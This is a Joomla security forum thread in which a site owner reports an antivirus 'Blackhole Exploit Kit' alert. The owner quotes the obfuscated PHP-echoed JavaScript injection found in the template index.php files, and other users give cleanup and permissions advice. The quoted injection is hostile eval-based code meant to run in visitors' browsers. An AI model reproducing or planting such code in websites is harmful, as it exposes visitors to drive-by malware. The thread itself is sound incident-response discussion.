AVG says: Exploit Blackhole Exploit Kit (type 2704)

Discussion regarding Joomla! 3.x security issues.

Moderators: mandville, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
Windows Defender SmartScreen Issues <-- please read this if using Windows 10.
Locked
RemoteC
Joomla! Apprentice
Joomla! Apprentice
Posts: 14
Joined: Wed Feb 09, 2011 10:32 am

AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by RemoteC » Mon Jun 24, 2013 6:16 pm

Hello!

Today I got a call from a friend whose website I made short time ago that she gets an error message from AVG saying that a Threat was blocked.
AVG wrote:File name: domain.tld/index.php
Threat name: Exploit Blackhole Eploit Kit (type 2704)
I visited the website with an empty sandbox and different browsers but no such message appeared on one of my PCs (Win7 x64 / Win XP). Neither from AVG - which I installed to test - nor any other virus or malware scanner (Avira, SUPERAntispyware, Malwarebytes).

Scan report from virustotal.com was also fine. Only suspicios is the scan from Wepawet that shows a request to about:blank and to h$$$://w$$.people-search-global.c$$/clicker.php (censored to avoid accidantal clicking). Link to report

So I had a further look and found a JS in every templates index.php file

Code: Select all

<?
#0c0896#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          ps=\"split\";e=eval;v=\"0x\";a=0;z=\"y\";try{a*=25}catch(zz){a=1}if(!a){try{--e(\"doc\"+\"ument\")[\"\x62od\"+z]}catch(q){a2=\"_\";sa=0xa-02;}z=3_15_12_15_12__12_85_15_12_85_15_12\"[ps](a2);za=\"\";for(i=0;i<z.length;i++){za+=String[\"fromCharCode\"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}</script>";

#/0c0896#
?>
Very, very suspicios!
I've replaced all the index.php files with the original installation file. I'm only using a slightly changed (CSS, PHP) protostar template for the website, no 3rd party templates.

I have not found any suspicios files with jamss.php (scanned after I've replaced the templates index.php files).

I also had a look at the database but I couldn't find anything unordinary there.

And here is what fpa says:
Problem Description :: Forum Post Assistant (v1.2.3) : 24th June 2013 wrote:Virus alert on website
Actions Taken To Resolve by Forum Post Assistant (v1.2.3) 24th June 2013 wrote:See description above.
Forum Post Assistant (v1.2.3) : 24th June 2013 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 3.1.1-Stable (Ember) 26-April-2013
Joomla! Platform :: Joomla Platform 12.2.0-Stable (Neil Armstrong) 21-September-2012
Joomla! Configured :: Yes | Writable (644) | Owner: zursonnenuhr (uid: 1/gid: 1) | Group: site520 (gid: 1) | Valid For: 3.1
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-348.3.1.el5PAE | Technology: i686 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /home/.sites/315/site520/web | System TMP Writable: No

PHP Configuration :: Version: 5.3.21 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 30711 | Log Errors To: /var/log/httpd/php.log | Last Known Error: | Register Globals: 0 | Magic Quotes: | Safe Mode: | Open Base: /home/.sites/315/site520/web:/home/.sites/315/site520/tmp:/usr/share/pear | Uploads: 1 | Max. Upload Size: 40M | Max. POST Size: 50M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 55M

MySQL Configuration :: Version: 5.1.67 (Client:mysqlnd 5.0.8-dev - 20102224 - $Id: 65fe78e70ce53d27a6cd578597722950e490b0d0 $) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 1014.11 KiB | #of Tables: 67
Detailed Environment :: wrote:PHP Extensions :: Core (5.3.21) | date (5.3.21) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7-dev) | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | session () | intl (1.1.0) | json (1.2.1) | mbstring () | mcrypt () | standard (5.3.21) | mysqlnd (mysqlnd 5.0.8-dev - 20102224 - $Id: 65fe78e70ce53d27a6cd578597722950e490b0d0 $) | mysqli (0.1) | mysql (1.0) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | Phar (2.0.1) | posix () | Reflection ($Id: 4af6c4c676864b1c0bfa693845af0688645c37cf $) | imap () | SimpleXML (0.1) | soap () | sockets () | SQLite (2.0-dev) | exif (1.4 $Id$) | suhosin (0.9.33) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | cgi-fcgi () | mhash () | Zend Engine (2.3.0) |
Potential Missing Extensions ::

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: error/ (775) |
Extensions Discovered :: wrote:Components :: SITE :: com_mailto (3.0.0) | com_wrapper (3.0.0) |
Components :: ADMIN :: com_easybookreloaded (3-1) | com_media (3.0.0) | com_checkin (3.0.0) | com_search (3.0.0) | com_installer (3.0.0) | com_content (3.0.0) | com_plugins (3.0.0) | com_redirect (3.0.0) | com_categories (3.0.0) | com_config (3.0.0) | com_tags (3.1.0) | com_weblinks (3.0.0) | com_login (3.0.0) | com_messages (3.0.0) | com_cache (3.0.0) | com_users (3.0.0) | com_admin (3.0.0) | com_cpanel (3.0.0) | com_finder (3.0.0) | com_menus (3.0.0) | com_banners (3.0.0) | com_templates (3.0.0) | com_newsfeeds (3.0.0) | com_modules (3.0.0) | com_joomlaupdate (3.0.0) | com_languages (3.0.0) |

Modules :: SITE :: mod_random_image (3.0.0) | mod_wrapper (3.0.0) | mod_articles_category (3.0.0) | mod_stats (3.0.0) | mod_articles_popular (3.0.0) | mod_related_items (3.0.0) | mod_login (3.0.0) | mod_languages (3.0.0) | mod_weblinks (3.0.0) | mod_tags_similar (3.1.0) | mod_tags_popular (3.1.0) | mod_articles_news (3.0.0) | mod_articles_archive (3.0.0) | mod_feed (3.0.0) | mod_articles_latest (3.0.0) | mod_users_latest (3.0.0) | mod_syndicate (3.0.0) | mod_breadcrumbs (3.0.0) | mod_finder (3.0.0) | mod_whosonline (3.0.0) | mod_menu (3.0.0) | mod_footer (3.0.0) | mod_search (3.0.0) | mod_custom (3.0.0) | mod_banners (3.0.0) | mod_articles_categories (3.0.0) |
Modules :: ADMIN :: mod_stats_admin (3.0.0) | mod_status (3.0.0) | mod_login (3.0.0) | mod_title (3.0.0) | mod_toolbar (3.0.0) | mod_quickicon (3.0.0) | mod_feed (3.0.0) | mod_submenu (3.0.0) | mod_popular (3.0.0) | mod_menu (3.0.0) | mod_logged (3.0.0) | mod_custom (3.0.0) | mod_multilangstatus (3.0.0) | mod_latest (3.0.0) | mod_version (3.0.0) |

Plugins :: SITE :: PLG_CONTENT_SIGE (3-1) | plg_content_pagebreak (3.0.0) | plg_content_finder (3.0.0) | plg_content_pagenavigation (3.0.0) | plg_content_vote (3.0.0) | plg_content_emailcloak (3.0.0) | plg_content_joomla (3.0.0) | plg_content_loadmodule (3.0.0) | plg_quickicon_joomlaupdate (3.0.0) | plg_quickicon_extensionupdate (3.0.0) | plg_editors_codemirror (1.0) | plg_editors_tinymce (3.5.6) | plg_system_sef (3.0.0) | plg_system_remember (3.0.0) | plg_system_languagecode (3.0.0) | plg_system_cache (3.0.0) | plg_system_p3p (3.0.0) | plg_system_logout (3.0.0) | plg_system_redirect (3.0.0) | plg_system_highlight (3.0.0) | plg_system_languagefilter (3.0.0) | plg_system_debug (3.0.0) | plg_system_log (3.0.0) | plg_finder_content (3.0.0) | plg_finder_contacts (3.0.0) | plg_finder_newsfeeds (3.0.0) | plg_finder_categories (3.0.0) | plg_finder_tags (3.0.0) | plg_finder_weblinks (3.0.0) | plg_extension_joomla (3.0.0) | plg_editors-xtd_pagebreak (3.0.0) | plg_editors-xtd_readmore (3.0.0) | plg_editors-xtd_image (3.0.0) | plg_editors-xtd_article (3.0.0) | plg_authentication_joomla (3.0.0) | plg_authentication_gmail (3.0.0) | plg_authentication_ldap (3.0.0) | plg_search_content (3.0.0) | plg_search_contacts (3.0.0) | plg_search_newsfeeds (3.0.0) | plg_search_categories (3.0.0) | plg_search_weblinks (3.0.0) | plg_captcha_recaptcha (3.0.0) | plg_user_contactcreator (3.0.0) | plg_user_profile (3.0.0) | plg_user_joomla (3.0.0) |
Templates Discovered :: wrote:Templates :: SITE :: beez3 (3.1.0) | protostar (1.0) | protostar (1.0) |
Templates :: ADMIN :: hathor (3.0.0) | isis (1.0) |
Of course I've changed all administrator passwords, FTP password and mySQL password.
Last edited by mandville on Mon Jun 24, 2013 7:32 pm, edited 1 time in total.
Reason: trimmed code, for readability
Top
mattsimonsen
Joomla! Apprentice
Joomla! Apprentice
Posts: 17
Joined: Thu Jun 13, 2013 2:29 am
Location: Jackson, CA, USA
Contact:
Contact mattsimonsen

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by mattsimonsen » Mon Jun 24, 2013 8:49 pm

Once you see a single exploit, there are many areas that may get infected. We have seen sites where multiple hacks occur, even htaccess files that are specifically created to keep out other hackers!

The database, PHP files, even CSS and/or template theme files often get changed. Of course if the warning is cached, if could be that you have fixed it, and the anti-virus folks have not updated their system to reflect the cleaned up site.

One good starting guide is here: http://www.google.com/webmasters/hacked/ The process isn't simple, and once in a site hackers are vigilant to stay hidden.
Matt Simonsen
SRI Hosting, Inc. http://srihosting.com
Founded in 2005, an IT Services company with proven success building and running Joomla sites.
Top
RemoteC
Joomla! Apprentice
Joomla! Apprentice
Posts: 14
Joined: Wed Feb 09, 2011 10:32 am

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by RemoteC » Tue Jun 25, 2013 9:25 am

But where is the exploit? How can I fix it? Was it really by key-logging the administrator and/or FTP password? The problem for me is: I know how to keep a system clean (at least I think so) but a lot of users, that may have privilegs on a Joomla! site, do not care about security. Mobile devices are an additional risk, as I've read this exploit kit can also handle Android. So maybe not the PC is infected but a tablet or smartphone from which the administrator panel was accessed.

Or is there something hidden in either the core or in one of the two plugins I've installed: Easybook Reloaded and Simple Image Gallery Extended. I'm using both extensions on multiple sites - the one infected is my first J! 3 site.

I have not found any other changed files like .htaccess or the folders index.html files. It is of course quite effective to change every templates index.php file because this file is rendered in the browser. Is it maybe also easier to change template files?
Top
User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by mandville » Tue Jun 25, 2013 11:36 am

Why do you have an error folder with 775 permissions
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Top
RemoteC
Joomla! Apprentice
Joomla! Apprentice
Posts: 14
Joined: Wed Feb 09, 2011 10:32 am

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by RemoteC » Tue Jun 25, 2013 8:21 pm

mandville wrote:Why do you have an error folder with 775 permissions
I don't know. This is default folder from my webhoster including the default 404, 500, ... html error pages with logo and slogan from my webhoster.
Anyway, I've changed it to 755. There is no malicious code in the error html files.
Top
User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15152
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: AVG says: Exploit Blackhole Exploit Kit (type 2704)

Post by mandville » Tue Jun 25, 2013 8:36 pm

i suggest you check with your host what their mask, skel and jailshell situation is like.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
Top
Locked

Return to “Security in Joomla! 3.x”